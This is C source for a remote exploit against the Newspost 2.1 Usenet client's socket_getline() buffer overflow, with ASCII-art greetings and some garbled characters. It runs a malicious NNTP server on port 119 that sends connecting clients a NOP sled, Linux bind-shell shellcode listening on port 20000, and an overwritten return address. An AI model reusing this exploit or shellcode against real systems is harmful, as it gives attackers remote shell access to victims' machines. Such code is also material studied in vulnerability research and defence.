/* 02/03/2005 NOTES: -Newspost "socket_getline()" Buffer Overflow Exploit Client Usage ------------ cybertronic:~/newspost-2.1> ./newspost -i -n cyber -s tronic Greetz fly to my girlfriend YASMIN H. ? 嘩 M 嘩MM MMm 嘩MMM M$$MMm 嘩MMMM. MM$$MMMMm MMMMMMMM `MM$$MMMMMMm 4MMMM$$MM MMM$$MMMMMMMMm 尋MMM$$MMM MMM$$$MMMMMMMMm mMMMM$MMMM `MMM$$$MMMMMMMm MMMM$MMMM? MMMM$$$MMMMMMMm MMM$$MMM? `MMMMMMMMMMMMMm MMMMMMM? `MMMMMMMMMMMMMm MMMMMM `MMMMMMMMMMMM MMMMM `MMMMMMMMMM MMMMM `MMMMMMMMMMMM MMMMMMMMMMM mmMMMMMMMMMMMMMMMMM mmMMMMMMMMMMMMMMMMMMMMMM 嘩MM#MMMMMMMMMMMMMMMMMMMMm 4MMMMMMMMMMMMMMMMMMMMMMM MMMMMm_ mMMMMMMMMMMMMMMMMMMMM 4MMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMMMMMMMMMM 嘩n 嘩MMMMMMMMMMMMMMMMMMMMMMMM 嘩nn nM `MMMMMMMMMMMMMMMMMMMMMM? n? `? MMMMMMMMMMMMMMMMM? n? MMMMMM? mtr? mMMM nmM mM mM撈 M ' M n mM$ nM n嘩Mn敵 4M m 嘩 N ? 嬋 m? `n? mM NM? NM mM mMm nm M智M躁 n嘩m 幡 xn? ? 幡 xn? 嘩m Mn n? nM nMm mM `mMM? nM M nM ,` 幡? y M 幡? y nM ? nM ? ? ? M? M' 敵 M n.,? nm nM nM n M ? ? ? n MM? mM M nM ? M? n , nM 敵 nM M nM M M M? M n MMM? M? nM M闡M n幡N 嘩 nM 嘩 `嘩? 智 .N nM 幡M? M? n? cybertronic 2oo5 ? ________________ ----------------------/ MMMMMMMMm mMMMMMMM? 尋M$MMMMMMMMMm mMMMMMMMMM$MM` MMMMMMMMMMMMMMMm mMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMM `MMMMMMMMMMMMMMMMMM MMMMMMMMMMM(c)MMMM? 禎苃䞦 just want to say love you dad! 䞦騵梣 */ #include #include #include #include #include #define RED "\E[31m\E[1m" #define GREEN "\E[32m\E[1m" #define YELLOW "\E[33m\E[1m" #define BLUE "\E[34m\E[1m" #define NORMAL "\E[m" #define PORT 119 #define BACKLOG 5 //92 bytes bindcode port 20000 char scode[] = "\x31\xdb" // xor ebx, ebx "\xf7\xe3" // mul ebx "\xb0\x66" // mov al, 102 "\x53" // push ebx "\x43" // inc ebx "\x53" // push ebx "\x43" // inc ebx "\x53" // push ebx "\x89\xe1" // mov ecx, esp "\x4b" // dec ebx "\xcd\x80" // int 80h "\x89\xc7" // mov edi, eax "\x52" // push edx "\x66\x68\x4e\x20" // push word 8270 "\x43" // inc ebx "\x66\x53" // push bx "\x89\xe1" // mov ecx, esp "\xb0\xef" // mov al, 239 "\xf6\xd0" // not al "\x50" // push eax "\x51" // push ecx "\x57" // push edi "\x89\xe1" // mov ecx, esp "\xb0\x66" // mov al, 102 "\xcd\x80" // int 80h "\xb0\x66" // mov al, 102 "\x43" // inc ebx "\x43" // inc ebx "\xcd\x80" // int 80h "\x50" // push eax "\x50" // push eax "\x57" // push edi "\x89\xe1" // mov ecx, esp "\x43" // inc ebx "\xb0\x66" // mov al, 102 "\xcd\x80" // int 80h "\x89\xd9" // mov ecx, ebx "\x89\xc3" // mov ebx, eax "\xb0\x3f" // mov al, 63 "\x49" // dec ecx "\xcd\x80" // int 80h "\x41" // inc ecx "\xe2\xf8" // loop lp "\x51" // push ecx "\x68\x6e\x2f\x73\x68" // push dword 68732f6eh "\x68\x2f\x2f\x62\x69" // push dword 69622f2fh "\x89\xe3" // mov ebx, esp "\x51" // push ecx "\x53" // push ebx "\x89\xe1" // mov ecx, esp "\xb0\xf4" // mov al, 244 "\xf6\xd0" // not al "\xcd\x80"; // int 80h void cmd ( int connfd ); void header (); int main ( int argc, char* argv[] ) { int listenfd, connfd; pid_t childpid; socklen_t clilen; struct sockaddr_in cliaddr, servaddr; header (); printf ( "[*] Creating socket..." ); if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 ) { printf ( RED "FAILED!\n" NORMAL ); exit ( 1 ); } printf ( GREEN "OK!\n" NORMAL ); bzero ( &servaddr, sizeof ( servaddr ) ); servaddr.sin_family = AF_INET; servaddr.sin_addr.s_addr = htonl ( INADDR_ANY ); servaddr.sin_port = htons ( PORT ); bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) ); printf ( "[*] Listening..." ); if ( listen ( listenfd, BACKLOG ) == -1 ) { printf ( RED "FAILED!\n" NORMAL ); exit ( 1 ); } printf ( GREEN "OK!\n" NORMAL ); for ( ; ; ) { clilen = sizeof ( cliaddr ); if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 ) { close ( listenfd ); exit ( 1 ); } if ( ( childpid = fork ( ) ) == 0 ) { close ( listenfd ); printf ( "[*]" GREEN " Incomming connection from:\t %s\n" NORMAL, inet_ntoa ( cliaddr.sin_addr ) ); cmd ( connfd ); } close ( connfd ); } } void cmd ( int s ) { char in[1024], out[1200]; unsigned long ret = 0xbfffecb8; bzero ( &out, 1200 ); memset ( out, 0x90, 956 ); //956 memcpy ( out + 956, scode, sizeof ( scode ) ); strcat ( out, "\x41\x41\x41\x41" ); strncat ( out, ( unsigned char* ) &ret, 4 ); printf ( "[*] Sending Bad Packet [ %u bytes ]...", strlen ( out ) ); if ( write ( s, out, strlen ( out ) ) <= 0 ) { printf ( RED "FAILED!\n" NORMAL); exit ( 1 ); } printf ( GREEN "OK!\n" NORMAL); sleep ( 1 ); } void header () { system ( "clear" ); printf ( RED "### " GREEN "# # " YELLOW "### " BLUE "### " RED "### " GREEN "### " YELLOW "### " BLUE "### " RED "# # " GREEN "# " YELLOW "###\n" NORMAL); printf ( RED "# " GREEN "# # " YELLOW "# # " BLUE "# " RED "# # " GREEN " # " YELLOW "# # " BLUE "# # " RED "## # " GREEN "# " YELLOW "# \n" NORMAL); printf ( RED "# " GREEN "# # " YELLOW "### " BLUE "### " RED "### " GREEN " # " YELLOW "### " BLUE "# # " RED "# # # " GREEN "# " YELLOW "# \n" NORMAL); printf ( RED "# " GREEN " # " YELLOW "# # " BLUE "# " RED "# # " GREEN " # " YELLOW "# # " BLUE "# # " RED "# ## " GREEN "# " YELLOW "# \n" NORMAL); printf ( RED "### " GREEN " # " YELLOW "### " BLUE "### " RED "# # " GREEN " # " YELLOW "# # " BLUE "### " RED "# # " GREEN "# " YELLOW "###\n" NORMAL); printf ( RED " cybertronic@gmx.net\n" NORMAL ); printf ( RED " ----------(c) 2005----------\n\n" NORMAL ); printf ( "newspost-2.1\n\n" ); }

捚粔韁藝婓盄